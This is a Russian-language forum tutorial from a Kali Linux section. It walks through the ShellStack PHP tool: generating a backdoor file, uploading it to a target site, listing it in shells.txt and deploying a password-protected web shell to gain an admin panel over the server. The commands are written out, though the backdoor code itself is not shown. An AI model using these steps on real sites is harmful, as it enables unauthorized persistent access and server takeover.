Загрузка...

Shellstack - Backdoor Management

Тема в разделе Kali Linux создана пользователем mrJollier 20 май 2018. 325 просмотров

Загрузка...
  1. mrJollier
    mrJollier Автор темы 20 май 2018 Всё ещё живой 540 15 фев 2017
    Здесь речь пойдет о ShellStack – это инструмент на PHP, его предназначением является, менеджмент бэкдоров на целевом сайте.



    Под словом менеджмент, я подразумеваю управление, создание, загрузка на целевой хост.

    [IMG]
    ShellStack - этот инструмент подходит для пентестеров, которые хотят отслеживать каждое движение на сайте, который они взламывают. Инструмент генерирует бэкдор-файл, который вам просто нужно загрузить на сайт, и поместить URL-адрес backdoor’a в файл shells.txt, присутствующий в каталоге инструмента.



    Клонируем инструмент на свою машину с Github.

    > git clone https://github.com/Tuhinshubhra/shellstack

    > cd shellstack

    [IMG]
    Запускаем:

    > php shellstack.php

    [IMG]
    Теперь необходимо сгенерировать backdoor, пишем команду:

    > generatebd

    [IMG]
    Выходим из программы Ctrl+C.



    В папке с ShellStack находим backdoor.php и загружаем его на целевой сервер.

    [IMG]
    Копируем URL нашего backdoor:

    [IMG]
    И вставляем его в файл shells.txt:

    > echo http://172.16.0.223/pentest/backdoor.php > shells.txt

    [IMG]
    Запускаем ShellStack:

    > php shellstack.php

    Видим, что наш бэкдор находится под номером 0. Выбираем его для запуска.

    > 0

    [IMG]
    Открывается список доступных действий:

    [IMG]
    Узнаем немного больше о целевом хосте:

    > 2

    [IMG]
    Теперь можно загрузить шелл, которым потом воспользуемся для получения дополнительных плюшек:

    > 1

    [IMG]
    Обращаем внимание на то, что у каждого шелла есть пароль/логин.



    Теперь, обращаемся на целевой хост по адресу находящегося там шелла, он загружается туда автоматически:

    [IMG]
    > 172.16.0.223/pentest/kurama.php



    Вводим пароль к шеллу и попадаем в административную панель:

    [IMG]
    Дальше, посредством этих красных кнопочек делаем с сервером/сайтом, что позволит нам воображение/благоразумие.
     
  2. ivNNN
    ivNNN 20 май 2018 3217 10 окт 2016
    Ты следующий после Енота.
     
Top